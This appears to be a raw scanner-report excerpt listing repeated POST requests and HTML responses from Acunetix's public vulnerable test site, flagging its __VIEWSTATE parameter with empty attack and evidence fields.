Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8405&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgAA4cmv7toIZGRkjrZyUECQ0TL730sjilQC7IoCYSY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLjy4qZDgL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gWkGOgRqCD8jCtjMGz%2FNZWd4iRdzw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:10:12 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgAA4cmv7toIZGRkjrZyUECQ0TL730sjilQC7IoCYSY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjy4qZDgL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gWkGOgRqCD8jCtjMGz/NZWd4iRdzw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:White" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8409&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgAAiHPU8doIZGRk0X4Aj49TMs6s8iT2xBnXqyY%2F4hc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLggKKtAwL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUyXfCjpgLgjbfmD6GtFotZawa4SQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:21:54 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgAAiHPU8doIZGRk0X4Aj49TMs6s8iT2xBnXqyY/4hc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLggKKtAwL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUyXfCjpgLgjbfmD6GtFotZawa4SQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:White" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1101 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
